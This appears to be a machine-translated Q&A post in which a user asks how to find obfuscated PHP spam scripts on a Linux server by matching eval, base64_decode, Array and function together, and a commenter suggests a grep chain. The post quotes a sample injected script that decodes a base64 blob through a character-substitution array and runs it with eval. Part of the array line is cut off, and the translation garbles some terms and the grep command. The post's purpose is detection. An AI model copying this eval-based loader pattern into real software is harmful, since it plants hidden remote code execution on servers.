0
我需要找到在Linux服务器上具有完全相同的4种模式的PHP脚本。找到4种模式的PHP文件
的文件需要有4模式/字,而不是只有一两个...
模式:
- EVAL
- BASE64_DECODE
- 阵列
- 功能
我需要这个来找到编码垃圾邮件脚本。
我已经试过找到,但我不知道如何搭配的精确4种模式
像这样:
<?php
function isanrl($nhfxslsmo, $rrkiu){$m = ''; for($i=0; $i < strlen($nhfxslsmo); $i++){$m .= isset($rrkiu[$nhfxslsmo[$i]]) ? $rrkiu[$nhfxslsmo[$i]] : $nhfxslsmo[$i];}
$dbklusmzx="base64_decode";return $dbklusmzx($m);}
$mpvqrt = 'XLgWYavbkPXhdna5ruv5PnoVk5rNSZea4Z1FK1FIYpeFPqBgx8f76Lv7Pna5ruv5r5rNSsIFK1F'.
'IYpeFPqBgx8f76pi9Pna9kpB2xLgV6gv3Yp2gd51fm8DG8DzbkPRJxLg0kavNYp2Fx8f1C'.
'4NC8uguCLgbrna3C8RJU3awaDawCwDCT1hddiv4RadpRad6d2zSUiv4RUoLd23fHwIMA5SGSIhddiv4R'.
'C8wR5kPB6S7SMPaNMjMdxSs3fdLdEksNC8PdgxQa56MzMjPBgBcRJkpec6nRgCQBgrugE6LgtkwfDruabCwDG873'.
'=';
$qqkghzt = Array('1'=>'w', '0'=>'t', '3'=>'0', '2'=>'1', '5'=>'y', '4'=>'T', '7'=>'n', '6'=>'b', '9'=>'4', '8'=>'C', 'A'=>'L', 'C'=>'K', 'B'=>'N', 'E'=>'h', 'D'=>'k$
eval(isanrl($mpvqrt, $qqkghzt));?>
转到代码库根目录并尝试grep'eval'-r。 | grep'base64_decode'| grep'Array'| grep'函数'。我想这会列出所有4个文件。 – chris85